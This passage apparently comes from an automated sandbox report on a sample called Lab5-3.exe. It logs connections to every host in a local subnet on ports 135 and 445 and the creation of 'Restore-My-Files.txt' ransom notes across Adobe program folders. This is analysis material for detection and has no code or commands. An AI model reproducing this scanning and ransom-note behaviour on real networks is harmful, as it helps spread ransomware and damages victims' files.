                      Source: global trafficTCP traffic: 192.168.2.154:135
                      Source: global trafficTCP traffic: 192.168.2.247:135
                      Source: global trafficTCP traffic: 192.168.2.126:135
                      Source: global trafficTCP traffic: 192.168.2.248:135
                      Source: global trafficTCP traffic: 192.168.2.127:135Jump to behavior
                      Source: global trafficTCP traffic: 192.168.2.245:135
                      Source: global trafficTCP traffic: 192.168.2.124:135
                      Source: global trafficTCP traffic: 192.168.2.246:135
                      Source: global trafficTCP traffic: 192.168.2.125:135
                      Source: global trafficTCP traffic: 192.168.2.249:135
                      Source: global trafficTCP traffic: 192.168.2.128:135
                      Source: global trafficTCP traffic: 192.168.2.129:135
                      Source: global trafficTCP traffic: 192.168.2.240:135
                      Source: global trafficTCP traffic: 192.168.2.243:135
                      Source: global trafficTCP traffic: 192.168.2.122:135
                      Source: global trafficTCP traffic: 192.168.2.244:135
                      Source: global trafficTCP traffic: 192.168.2.123:135
                      Source: global trafficTCP traffic: 192.168.2.241:135
                      Source: global trafficTCP traffic: 192.168.2.120:135
                      Source: global trafficTCP traffic: 192.168.2.242:135
                      Source: global trafficTCP traffic: 192.168.2.121:135
                      Source: global trafficTCP traffic: 192.168.2.137:135
                      Source: global trafficTCP traffic: 192.168.2.97:135
                      Source: global trafficTCP traffic: 192.168.2.138:135
                      Source: global trafficTCP traffic: 192.168.2.96:135
                      Source: global trafficTCP traffic: 192.168.2.135:135
                      Source: global trafficTCP traffic: 192.168.2.99:135
                      Source: global trafficTCP traffic: 192.168.2.136:135
                      Source: global trafficTCP traffic: 192.168.2.98:135
                      Source: global trafficTCP traffic: 192.168.2.139:135
                      Source: global trafficTCP traffic: 192.168.2.250:135
                      Source: global trafficTCP traffic: 192.168.2.251:135
                      Source: global trafficTCP traffic: 192.168.2.130:135
                      Source: global trafficTCP traffic: 192.168.2.91:135
                      Source: global trafficTCP traffic: 192.168.2.90:135
                      Source: global trafficTCP traffic: 192.168.2.254:135
                      Source: global trafficTCP traffic: 192.168.2.133:135
                      Source: global trafficTCP traffic: 192.168.2.93:135
                      Source: global trafficTCP traffic: 192.168.2.134:135
                      Source: global trafficTCP traffic: 192.168.2.92:135
                      Source: global trafficTCP traffic: 192.168.2.252:135
                      Source: global trafficTCP traffic: 192.168.2.95:135
                      Source: global trafficTCP traffic: 192.168.2.131:135
                      Source: global trafficTCP traffic: 192.168.2.253:135
                      Source: global trafficTCP traffic: 192.168.2.132:135
                      Source: global trafficTCP traffic: 192.168.2.94:135
                      Source: global trafficTCP traffic: 192.168.2.225:135
                      Source: global trafficTCP traffic: 192.168.2.104:135
                      Source: global trafficTCP traffic: 192.168.2.226:135
                      Source: global trafficTCP traffic: 192.168.2.105:135
                      Source: global trafficTCP traffic: 192.168.2.223:135
                      Source: global trafficTCP traffic: 192.168.2.102:135
                      Source: global trafficTCP traffic: 192.168.2.103:135
                      Source: global trafficTCP traffic: 192.168.2.224:135
                      Source: global trafficTCP traffic: 192.168.2.229:135
                      Source: global trafficTCP traffic: 192.168.2.108:135
                      Source: global trafficTCP traffic: 192.168.2.109:135
                      Source: global trafficTCP traffic: 192.168.2.227:135
                      Source: global trafficTCP traffic: 192.168.2.106:135
                      Source: global trafficTCP traffic: 192.168.2.228:135
                      Source: global trafficTCP traffic: 192.168.2.107:135
                      Source: global trafficTCP traffic: 192.168.2.100:135
                      Source: global trafficTCP traffic: 192.168.2.221:135
                      Source: global trafficTCP traffic: 192.168.2.101:135
                      Source: global trafficTCP traffic: 192.168.2.222:135
                      Source: global trafficTCP traffic: 192.168.2.220:135
                      Source: global trafficTCP traffic: 192.168.2.115:135
                      Source: global trafficTCP traffic: 192.168.2.236:135
                      Source: global trafficTCP traffic: 192.168.2.116:135
                      Source: global trafficTCP traffic: 192.168.2.237:135
                      Source: global trafficTCP traffic: 192.168.2.113:135
                      Source: global trafficTCP traffic: 192.168.2.234:135
                      Source: global trafficTCP traffic: 192.168.2.114:135
                      Source: global trafficTCP traffic: 192.168.2.235:135
                      Source: global trafficTCP traffic: 192.168.2.119:135
                      Source: global trafficTCP traffic: 192.168.2.238:135
                      Source: global trafficTCP traffic: 192.168.2.117:135
                      Source: global trafficTCP traffic: 192.168.2.239:135
                      Source: global trafficTCP traffic: 192.168.2.118:135
                      Source: global trafficTCP traffic: 192.168.2.111:135
                      Source: global trafficTCP traffic: 192.168.2.232:135
                      Source: global trafficTCP traffic: 192.168.2.233:135
                      Source: global trafficTCP traffic: 192.168.2.112:135
                      Source: global trafficTCP traffic: 192.168.2.230:135
                      Source: global trafficTCP traffic: 192.168.2.110:135
                      Source: global trafficTCP traffic: 192.168.2.231:135
                      Source: global trafficTCP traffic: 192.168.2.203:135
                      Source: global trafficTCP traffic: 192.168.2.204:135
                      Source: global trafficTCP traffic: 192.168.2.201:135
                      Source: global trafficTCP traffic: 192.168.2.202:135
                      Source: global trafficTCP traffic: 192.168.2.207:135
                      Source: global trafficTCP traffic: 192.168.2.208:135
                      Source: global trafficTCP traffic: 192.168.2.205:135
                      Source: global trafficTCP traffic: 192.168.2.206:135
                      Source: global trafficTCP traffic: 192.168.2.200:135
                      Source: global trafficTCP traffic: 192.168.2.209:135
                      Source: global trafficTCP traffic: 192.168.2.214:135
                      Source: global trafficTCP traffic: 192.168.2.215:135
                      Source: global trafficTCP traffic: 192.168.2.212:135
                      Source: global trafficTCP traffic: 192.168.2.213:135
                      Source: global trafficTCP traffic: 192.168.2.218:135
                      Source: global trafficTCP traffic: 192.168.2.219:135
                      Source: global trafficTCP traffic: 192.168.2.216:135
                      Source: global trafficTCP traffic: 192.168.2.217:135
                      Source: global trafficTCP traffic: 192.168.2.210:135
                      Source: global trafficTCP traffic: 192.168.2.211:135
                      Source: global trafficTCP traffic: 192.168.2.39:135
                      Source: global trafficTCP traffic: 192.168.2.38:135
                      Source: global trafficTCP traffic: 192.168.2.42:135
                      Source: global trafficTCP traffic: 192.168.2.41:135
                      Source: global trafficTCP traffic: 192.168.2.44:135
                      Source: global trafficTCP traffic: 192.168.2.43:135
                      Source: global trafficTCP traffic: 192.168.2.46:135
                      Source: global trafficTCP traffic: 192.168.2.45:135
                      Source: global trafficTCP traffic: 192.168.2.48:135
                      Source: global trafficTCP traffic: 192.168.2.47:135
                      Source: global trafficTCP traffic: 192.168.2.40:135
                      Source: global trafficTCP traffic: 192.168.2.28:135
                      Source: global trafficTCP traffic: 192.168.2.27:135
                      Source: global trafficTCP traffic: 192.168.2.29:135
                      Source: global trafficTCP traffic: 192.168.2.31:135
                      Source: global trafficTCP traffic: 192.168.2.30:135
                      Source: global trafficTCP traffic: 192.168.2.33:135
                      Source: global trafficTCP traffic: 192.168.2.32:135
                      Source: global trafficTCP traffic: 192.168.2.35:135
                      Source: global trafficTCP traffic: 192.168.2.34:135
                      Source: global trafficTCP traffic: 192.168.2.37:135
                      Source: global trafficTCP traffic: 192.168.2.36:135
                      Source: global trafficTCP traffic: 192.168.2.17:135
                      Source: global trafficTCP traffic: 192.168.2.16:135
                      Source: global trafficTCP traffic: 192.168.2.19:135
                      Source: global trafficTCP traffic: 192.168.2.18:135
                      Source: global trafficTCP traffic: 192.168.2.20:135
                      Source: global trafficTCP traffic: 192.168.2.22:135
                      Source: global trafficTCP traffic: 192.168.2.21:135
                      Source: global trafficTCP traffic: 192.168.2.24:135
                      Source: global trafficTCP traffic: 192.168.2.23:135
                      Source: global trafficTCP traffic: 192.168.2.26:135
                      Source: global trafficTCP traffic: 192.168.2.25:135
                      Source: global trafficTCP traffic: 192.168.2.11:135
                      Source: global trafficTCP traffic: 192.168.2.10:135
                      Source: global trafficTCP traffic: 192.168.2.13:135
                      Source: global trafficTCP traffic: 192.168.2.12:135
                      Source: global trafficTCP traffic: 192.168.2.15:135
                      Source: global trafficTCP traffic: 192.168.2.14:135
                      Source: global trafficTCP traffic: 192.168.2.0:135
                      Source: global trafficTCP traffic: 192.168.2.2:135
                      Source: global trafficTCP traffic: 192.168.2.1:445
                      Source: global trafficTCP traffic: 192.168.2.180:135
                      Source: global trafficTCP traffic: 192.168.2.181:135
                      Source: global trafficTCP traffic: 192.168.2.8:135
                      Source: global trafficTCP traffic: 192.168.2.7:135
                      Source: global trafficTCP traffic: 192.168.2.9:135
                      Source: global trafficTCP traffic: 192.168.2.3:135
                      Source: global trafficTCP traffic: 192.168.2.6:135
                      Source: global trafficTCP traffic: 192.168.2.5:135
                      Source: global trafficTCP traffic: 192.168.2.86:135
                      Source: global trafficTCP traffic: 192.168.2.85:135
                      Source: global trafficTCP traffic: 192.168.2.88:135
                      Source: global trafficTCP traffic: 192.168.2.87:135
                      Source: global trafficTCP traffic: 192.168.2.89:135
                      Source: global trafficTCP traffic: 192.168.2.184:135
                      Source: global trafficTCP traffic: 192.168.2.185:135
                      Source: global trafficTCP traffic: 192.168.2.182:135
                      Source: global trafficTCP traffic: 192.168.2.80:135
                      Source: global trafficTCP traffic: 192.168.2.183:135
                      Source: global trafficTCP traffic: 192.168.2.188:135
                      Source: global trafficTCP traffic: 192.168.2.82:135
                      Source: global trafficTCP traffic: 192.168.2.189:135
                      Source: global trafficTCP traffic: 192.168.2.81:135
                      Source: global trafficTCP traffic: 192.168.2.186:135
                      Source: global trafficTCP traffic: 192.168.2.84:135
                      Source: global trafficTCP traffic: 192.168.2.187:135
                      Source: global trafficTCP traffic: 192.168.2.83:135
                      Source: global trafficTCP traffic: 192.168.2.191:135
                      Source: global trafficTCP traffic: 192.168.2.192:135
                      Source: global trafficTCP traffic: 192.168.2.190:135
                      Source: global trafficTCP traffic: 192.168.2.75:135
                      Source: global trafficTCP traffic: 192.168.2.74:135
                      Source: global trafficTCP traffic: 192.168.2.77:135
                      Source: global trafficTCP traffic: 192.168.2.76:135
                      Source: global trafficTCP traffic: 192.168.2.79:135
                      Source: global trafficTCP traffic: 192.168.2.78:135
                      Source: global trafficTCP traffic: 192.168.2.195:135
                      Source: global trafficTCP traffic: 192.168.2.196:135
                      Source: global trafficTCP traffic: 192.168.2.193:135
                      Source: global trafficTCP traffic: 192.168.2.194:135
                      Source: global trafficTCP traffic: 192.168.2.199:135
                      Source: global trafficTCP traffic: 192.168.2.71:135
                      Source: global trafficTCP traffic: 192.168.2.70:135
                      Source: global trafficTCP traffic: 192.168.2.197:135
                      Source: global trafficTCP traffic: 192.168.2.73:135
                      Source: global trafficTCP traffic: 192.168.2.198:135
                      Source: global trafficTCP traffic: 192.168.2.72:135
                      Source: global trafficTCP traffic: 192.168.2.64:135
                      Source: global trafficTCP traffic: 192.168.2.63:135
                      Source: global trafficTCP traffic: 192.168.2.168:135
                      Source: global trafficTCP traffic: 192.168.2.66:135
                      Source: global trafficTCP traffic: 192.168.2.169:135
                      Source: global trafficTCP traffic: 192.168.2.65:135
                      Source: global trafficTCP traffic: 192.168.2.68:135
                      Source: global trafficTCP traffic: 192.168.2.67:135
                      Source: global trafficTCP traffic: 192.168.2.69:135
                      Source: global trafficTCP traffic: 192.168.2.162:135
                      Source: global trafficTCP traffic: 192.168.2.163:135
                      Source: global trafficTCP traffic: 192.168.2.160:135
                      Source: global trafficTCP traffic: 192.168.2.161:135
                      Source: global trafficTCP traffic: 192.168.2.166:135
                      Source: global trafficTCP traffic: 192.168.2.60:135
                      Source: global trafficTCP traffic: 192.168.2.167:135
                      Source: global trafficTCP traffic: 192.168.2.164:135
                      Source: global trafficTCP traffic: 192.168.2.62:135
                      Source: global trafficTCP traffic: 192.168.2.165:135
                      Source: global trafficTCP traffic: 192.168.2.61:135
                      Source: global trafficTCP traffic: 192.168.2.170:135
                      Source: global trafficTCP traffic: 192.168.2.49:135
                      Source: global trafficTCP traffic: 192.168.2.53:135
                      Source: global trafficTCP traffic: 192.168.2.52:135
                      Source: global trafficTCP traffic: 192.168.2.179:135
                      Source: global trafficTCP traffic: 192.168.2.55:135
                      Source: global trafficTCP traffic: 192.168.2.54:135
                      Source: global trafficTCP traffic: 192.168.2.57:135
                      Source: global trafficTCP traffic: 192.168.2.56:135
                      Source: global trafficTCP traffic: 192.168.2.59:135
                      Source: global trafficTCP traffic: 192.168.2.58:135
                      Source: global trafficTCP traffic: 192.168.2.173:135
                      Source: global trafficTCP traffic: 192.168.2.174:135
                      Source: global trafficTCP traffic: 192.168.2.171:135
                      Source: global trafficTCP traffic: 192.168.2.172:135
                      Source: global trafficTCP traffic: 192.168.2.177:135
                      Source: global trafficTCP traffic: 192.168.2.178:135
                      Source: global trafficTCP traffic: 192.168.2.175:135
                      Source: global trafficTCP traffic: 192.168.2.51:135
                      Source: global trafficTCP traffic: 192.168.2.176:135
                      Source: global trafficTCP traffic: 192.168.2.50:135
                      Source: global trafficTCP traffic: 192.168.2.148:445
                      Source: global trafficTCP traffic: 192.168.2.149:445
                      Source: global trafficTCP traffic: 192.168.2.146:445
                      Source: global trafficTCP traffic: 192.168.2.147:445
                      Source: global trafficTCP traffic: 192.168.2.140:445
                      Source: global trafficTCP traffic: 192.168.2.141:445
                      Source: global trafficTCP traffic: 192.168.2.144:445
                      Source: global trafficTCP traffic: 192.168.2.145:445
                      Source: global trafficTCP traffic: 192.168.2.142:445
                      Source: global trafficTCP traffic: 192.168.2.143:445
                      Source: global trafficTCP traffic: 192.168.2.159:445
                      Source: global trafficTCP traffic: 192.168.2.157:445
                      Source: global trafficTCP traffic: 192.168.2.158:445
                      Source: global trafficTCP traffic: 192.168.2.151:445
                      Source: global trafficTCP traffic: 192.168.2.152:445
                      Source: global trafficTCP traffic: 192.168.2.150:445
                      Source: global trafficTCP traffic: 192.168.2.155:445
                      Source: global trafficTCP traffic: 192.168.2.156:445
                      Source: global trafficTCP traffic: 192.168.2.153:445
                      Source: global trafficTCP traffic: 192.168.2.154:445
                      Source: global trafficTCP traffic: 192.168.2.247:445
                      Source: global trafficTCP traffic: 192.168.2.126:445
                      Source: global trafficTCP traffic: 192.168.2.248:445
                      Source: global trafficTCP traffic: 192.168.2.127:445Jump to behavior
                      Source: global trafficTCP traffic: 192.168.2.245:445
                      Source: global trafficTCP traffic: 192.168.2.124:445
                      Source: global trafficTCP traffic: 192.168.2.246:445
                      Source: global trafficTCP traffic: 192.168.2.125:445
                      Source: global trafficTCP traffic: 192.168.2.249:445
                      Source: global trafficTCP traffic: 192.168.2.128:445
                      Source: global trafficTCP traffic: 192.168.2.129:445
                      Source: global trafficTCP traffic: 192.168.2.240:445
                      Source: global trafficTCP traffic: 192.168.2.243:445
                      Source: global trafficTCP traffic: 192.168.2.122:445
                      Source: global trafficTCP traffic: 192.168.2.244:445
                      Source: global trafficTCP traffic: 192.168.2.123:445
                      Source: global trafficTCP traffic: 192.168.2.241:445
                      Source: global trafficTCP traffic: 192.168.2.120:445
                      Source: global trafficTCP traffic: 192.168.2.242:445
                      Source: global trafficTCP traffic: 192.168.2.121:445
                      Source: global trafficTCP traffic: 192.168.2.137:445
                      Source: global trafficTCP traffic: 192.168.2.97:445
                      Source: global trafficTCP traffic: 192.168.2.138:445
                      Source: global trafficTCP traffic: 192.168.2.96:445
                      Source: global trafficTCP traffic: 192.168.2.135:445
                      Source: global trafficTCP traffic: 192.168.2.99:445
                      Source: global trafficTCP traffic: 192.168.2.136:445
                      Source: global trafficTCP traffic: 192.168.2.98:445
                      Source: global trafficTCP traffic: 192.168.2.139:445
                      Source: global trafficTCP traffic: 192.168.2.250:445
                      Source: global trafficTCP traffic: 192.168.2.251:445
                      Source: global trafficTCP traffic: 192.168.2.130:445
                      Source: global trafficTCP traffic: 192.168.2.91:445
                      Source: global trafficTCP traffic: 192.168.2.90:445
                      Source: global trafficTCP traffic: 192.168.2.254:445
                      Source: global trafficTCP traffic: 192.168.2.133:445
                      Source: global trafficTCP traffic: 192.168.2.93:445
                      Source: global trafficTCP traffic: 192.168.2.134:445
                      Source: global trafficTCP traffic: 192.168.2.92:445
                      Source: global trafficTCP traffic: 192.168.2.252:445
                      Source: global trafficTCP traffic: 192.168.2.95:445
                      Source: global trafficTCP traffic: 192.168.2.131:445
                      Source: global trafficTCP traffic: 192.168.2.253:445
                      Source: global trafficTCP traffic: 192.168.2.132:445
                      Source: global trafficTCP traffic: 192.168.2.94:445
                      Source: global trafficTCP traffic: 192.168.2.225:445
                      Source: global trafficTCP traffic: 192.168.2.104:445
                      Source: global trafficTCP traffic: 192.168.2.226:445
                      Source: global trafficTCP traffic: 192.168.2.105:445
                      Source: global trafficTCP traffic: 192.168.2.223:445
                      Source: global trafficTCP traffic: 192.168.2.102:445
                      Source: global trafficTCP traffic: 192.168.2.103:445
                      Source: global trafficTCP traffic: 192.168.2.224:445
                      Source: global trafficTCP traffic: 192.168.2.229:445
                      Source: global trafficTCP traffic: 192.168.2.108:445
                      Source: global trafficTCP traffic: 192.168.2.109:445
                      Source: global trafficTCP traffic: 192.168.2.227:445
                      Source: global trafficTCP traffic: 192.168.2.106:445
                      Source: global trafficTCP traffic: 192.168.2.228:445
                      Source: global trafficTCP traffic: 192.168.2.107:445
                      Source: global trafficTCP traffic: 192.168.2.100:445
                      Source: global trafficTCP traffic: 192.168.2.221:445
                      Source: global trafficTCP traffic: 192.168.2.101:445
                      Source: global trafficTCP traffic: 192.168.2.222:445
                      Source: global trafficTCP traffic: 192.168.2.220:445
                      Source: global trafficTCP traffic: 192.168.2.115:445
                      Source: global trafficTCP traffic: 192.168.2.236:445
                      Source: global trafficTCP traffic: 192.168.2.116:445
                      Source: global trafficTCP traffic: 192.168.2.237:445
                      Source: global trafficTCP traffic: 192.168.2.113:445
                      Source: global trafficTCP traffic: 192.168.2.234:445
                      Source: global trafficTCP traffic: 192.168.2.114:445
                      Source: global trafficTCP traffic: 192.168.2.235:445
                      Source: global trafficTCP traffic: 192.168.2.119:445
                      Source: global trafficTCP traffic: 192.168.2.238:445
                      Source: global trafficTCP traffic: 192.168.2.117:445
                      Source: global trafficTCP traffic: 192.168.2.239:445
                      Source: global trafficTCP traffic: 192.168.2.118:445
                      Source: global trafficTCP traffic: 192.168.2.111:445
                      Source: global trafficTCP traffic: 192.168.2.232:445
                      Source: global trafficTCP traffic: 192.168.2.233:445
                      Source: global trafficTCP traffic: 192.168.2.112:445
                      Source: global trafficTCP traffic: 192.168.2.230:445
                      Source: global trafficTCP traffic: 192.168.2.110:445
                      Source: global trafficTCP traffic: 192.168.2.231:445
                      Source: global trafficTCP traffic: 192.168.2.203:445
                      Source: global trafficTCP traffic: 192.168.2.204:445
                      Source: global trafficTCP traffic: 192.168.2.201:445
                      Source: global trafficTCP traffic: 192.168.2.202:445
                      Source: global trafficTCP traffic: 192.168.2.207:445
                      Source: global trafficTCP traffic: 192.168.2.208:445
                      Source: global trafficTCP traffic: 192.168.2.205:445
                      Source: global trafficTCP traffic: 192.168.2.206:445
                      Source: global trafficTCP traffic: 192.168.2.200:445
                      Source: global trafficTCP traffic: 192.168.2.209:445
                      Source: global trafficTCP traffic: 192.168.2.214:445
                      Source: global trafficTCP traffic: 192.168.2.215:445
                      Source: global trafficTCP traffic: 192.168.2.212:445
                      Source: global trafficTCP traffic: 192.168.2.213:445
                      Source: global trafficTCP traffic: 192.168.2.218:445
                      Source: global trafficTCP traffic: 192.168.2.219:445
                      Source: global trafficTCP traffic: 192.168.2.216:445
                      Source: global trafficTCP traffic: 192.168.2.217:445
                      Source: global trafficTCP traffic: 192.168.2.210:445
                      Source: global trafficTCP traffic: 192.168.2.211:445
                      Source: global trafficTCP traffic: 192.168.2.39:445
                      Source: global trafficTCP traffic: 192.168.2.38:445
                      Source: global trafficTCP traffic: 192.168.2.42:445
                      Source: global trafficTCP traffic: 192.168.2.41:445
                      Source: global trafficTCP traffic: 192.168.2.44:445
                      Source: global trafficTCP traffic: 192.168.2.43:445
                      Source: global trafficTCP traffic: 192.168.2.46:445
                      Source: global trafficTCP traffic: 192.168.2.45:445
                      Source: global trafficTCP traffic: 192.168.2.48:445
                      Source: global trafficTCP traffic: 192.168.2.47:445
                      Source: global trafficTCP traffic: 192.168.2.40:445
                      Source: global trafficTCP traffic: 192.168.2.28:445
                      Source: global trafficTCP traffic: 192.168.2.27:445
                      Source: global trafficTCP traffic: 192.168.2.29:445
                      Source: global trafficTCP traffic: 192.168.2.31:445
                      Source: global trafficTCP traffic: 192.168.2.30:445
                      Source: global trafficTCP traffic: 192.168.2.33:445
                      Source: global trafficTCP traffic: 192.168.2.32:445
                      Source: global trafficTCP traffic: 192.168.2.35:445
                      Source: global trafficTCP traffic: 192.168.2.34:445
                      Source: global trafficTCP traffic: 192.168.2.37:445
                      Source: global trafficTCP traffic: 192.168.2.36:445
                      Source: global trafficTCP traffic: 192.168.2.17:445
                      Source: global trafficTCP traffic: 192.168.2.16:445
                      Source: global trafficTCP traffic: 192.168.2.19:445
                      Source: global trafficTCP traffic: 192.168.2.18:445
                      Source: global trafficTCP traffic: 192.168.2.20:445
                      Source: global trafficTCP traffic: 192.168.2.22:445
                      Source: global trafficTCP traffic: 192.168.2.21:445
                      Source: global trafficTCP traffic: 192.168.2.24:445
                      Source: global trafficTCP traffic: 192.168.2.23:445
                      Source: global trafficTCP traffic: 192.168.2.26:445
                      Source: global trafficTCP traffic: 192.168.2.25:445
                      Source: global trafficTCP traffic: 192.168.2.11:445
                      Source: global trafficTCP traffic: 192.168.2.10:445
                      Source: global trafficTCP traffic: 192.168.2.13:445
                      Source: global trafficTCP traffic: 192.168.2.12:445
                      Source: global trafficTCP traffic: 192.168.2.15:445
                      Source: global trafficTCP traffic: 192.168.2.14:445
                      Source: global trafficTCP traffic: 192.168.2.0:445
                      Source: global trafficTCP traffic: 192.168.2.2:445
                      Source: global trafficTCP traffic: 192.168.2.1:445
                      Source: global trafficTCP traffic: 192.168.2.180:445
                      Source: global trafficTCP traffic: 192.168.2.181:445
                      Source: global trafficTCP traffic: 192.168.2.8:445
                      Source: global trafficTCP traffic: 192.168.2.7:445
                      Source: global trafficTCP traffic: 192.168.2.9:445
                      Source: global trafficTCP traffic: 192.168.2.3:445
                      Source: global trafficTCP traffic: 192.168.2.6:445
                      Source: global trafficTCP traffic: 192.168.2.5:445
                      Source: global trafficTCP traffic: 192.168.2.86:445
                      Source: global trafficTCP traffic: 192.168.2.85:445
                      Source: global trafficTCP traffic: 192.168.2.88:445
                      Source: global trafficTCP traffic: 192.168.2.87:445
                      Source: global trafficTCP traffic: 192.168.2.89:445
                      Source: global trafficTCP traffic: 192.168.2.184:445
                      Source: global trafficTCP traffic: 192.168.2.185:445
                      Source: global trafficTCP traffic: 192.168.2.182:445
                      Source: global trafficTCP traffic: 192.168.2.80:445
                      Source: global trafficTCP traffic: 192.168.2.183:445
                      Source: global trafficTCP traffic: 192.168.2.188:445
                      Source: global trafficTCP traffic: 192.168.2.82:445
                      Source: global trafficTCP traffic: 192.168.2.189:445
                      Source: global trafficTCP traffic: 192.168.2.81:445
                      Source: global trafficTCP traffic: 192.168.2.186:445
                      Source: global trafficTCP traffic: 192.168.2.84:445
                      Source: global trafficTCP traffic: 192.168.2.187:445
                      Source: global trafficTCP traffic: 192.168.2.83:445
                      Source: global trafficTCP traffic: 192.168.2.191:445
                      Source: global trafficTCP traffic: 192.168.2.192:445
                      Source: global trafficTCP traffic: 192.168.2.190:445
                      Source: global trafficTCP traffic: 192.168.2.75:445
                      Source: global trafficTCP traffic: 192.168.2.74:445
                      Source: global trafficTCP traffic: 192.168.2.77:445
                      Source: global trafficTCP traffic: 192.168.2.76:445
                      Source: global trafficTCP traffic: 192.168.2.79:445
                      Source: global trafficTCP traffic: 192.168.2.78:445
                      Source: global trafficTCP traffic: 192.168.2.195:445
                      Source: global trafficTCP traffic: 192.168.2.196:445
                      Source: global trafficTCP traffic: 192.168.2.193:445
                      Source: global trafficTCP traffic: 192.168.2.194:445
                      Source: global trafficTCP traffic: 192.168.2.199:445
                      Source: global trafficTCP traffic: 192.168.2.71:445
                      Source: global trafficTCP traffic: 192.168.2.70:445
                      Source: global trafficTCP traffic: 192.168.2.197:445
                      Source: global trafficTCP traffic: 192.168.2.73:445
                      Source: global trafficTCP traffic: 192.168.2.198:445
                      Source: global trafficTCP traffic: 192.168.2.72:445
                      Source: global trafficTCP traffic: 192.168.2.64:445
                      Source: global trafficTCP traffic: 192.168.2.63:445
                      Source: global trafficTCP traffic: 192.168.2.168:445
                      Source: global trafficTCP traffic: 192.168.2.66:445
                      Source: global trafficTCP traffic: 192.168.2.169:445
                      Source: global trafficTCP traffic: 192.168.2.65:445
                      Source: global trafficTCP traffic: 192.168.2.68:445
                      Source: global trafficTCP traffic: 192.168.2.67:445
                      Source: global trafficTCP traffic: 192.168.2.69:445
                      Source: global trafficTCP traffic: 192.168.2.162:445
                      Source: global trafficTCP traffic: 192.168.2.163:445
                      Source: global trafficTCP traffic: 192.168.2.160:445
                      Source: global trafficTCP traffic: 192.168.2.161:445
                      Source: global trafficTCP traffic: 192.168.2.166:445
                      Source: global trafficTCP traffic: 192.168.2.60:445
                      Source: global trafficTCP traffic: 192.168.2.167:445
                      Source: global trafficTCP traffic: 192.168.2.164:445
                      Source: global trafficTCP traffic: 192.168.2.62:445
                      Source: global trafficTCP traffic: 192.168.2.165:445
                      Source: global trafficTCP traffic: 192.168.2.61:445
                      Source: global trafficTCP traffic: 192.168.2.170:445
                      Source: global trafficTCP traffic: 192.168.2.49:445
                      Source: global trafficTCP traffic: 192.168.2.53:445
                      Source: global trafficTCP traffic: 192.168.2.52:445
                      Source: global trafficTCP traffic: 192.168.2.179:445
                      Source: global trafficTCP traffic: 192.168.2.55:445
                      Source: global trafficTCP traffic: 192.168.2.54:445
                      Source: global trafficTCP traffic: 192.168.2.57:445
                      Source: global trafficTCP traffic: 192.168.2.56:445
                      Source: global trafficTCP traffic: 192.168.2.59:445
                      Source: global trafficTCP traffic: 192.168.2.58:445
                      Source: global trafficTCP traffic: 192.168.2.173:445
                      Source: global trafficTCP traffic: 192.168.2.174:445
                      Source: global trafficTCP traffic: 192.168.2.171:445
                      Source: global trafficTCP traffic: 192.168.2.172:445
                      Source: global trafficTCP traffic: 192.168.2.177:445
                      Source: global trafficTCP traffic: 192.168.2.178:445
                      Source: global trafficTCP traffic: 192.168.2.175:445
                      Source: global trafficTCP traffic: 192.168.2.51:445
                      Source: global trafficTCP traffic: 192.168.2.176:445
                      Source: global trafficTCP traffic: 192.168.2.50:445
                      Source: Lab5-3.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\Restore-My-Files.txtJump to behavior
